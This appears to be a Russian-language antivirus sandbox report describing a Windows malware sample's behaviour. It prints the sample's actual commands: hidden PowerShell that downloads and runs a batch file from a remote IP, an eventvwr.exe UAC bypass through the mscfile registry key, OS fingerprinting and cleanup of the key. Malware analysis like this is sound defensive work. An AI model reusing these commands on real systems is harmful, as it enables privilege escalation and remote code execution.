Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\software\classes\mscfile\shell\open\command] '' = 'cmd.exe /c powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('http://23.98.155.192/sc.bat', 'C:\Use...
Вредоносные функции
Загружает
- http://23.##.155.192/sc.bat as c:\users\public\libraries\sc.bat
Сетевая активность
Подключается к
- '23.##.155.192':80
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('http://23.##.155.192/sc.bat', 'C:\Users\Public\Libraries\sc.bat');" C:\Users\Public\Libraries\sc.bat' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c wmic os get caption,version /format:csv
- '<SYSTEM32>\wbem\wmic.exe' os get caption,version /format:csv
- '<SYSTEM32>\cmd.exe' /S /D /c" echo Microsoft Windows 7 Enterprise "
- '<SYSTEM32>\find.exe' " 10 "
- '<SYSTEM32>\reg.exe' add hkcu\software\classes\mscfile\shell\open\command /ve /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://23.##.155.192/sc.bat', 'C:\...
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('http://23.##.155.192/sc.bat', 'C:\Users\Public\Libraries\sc.bat');" C:\Users\Public\Libraries\sc.bat
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
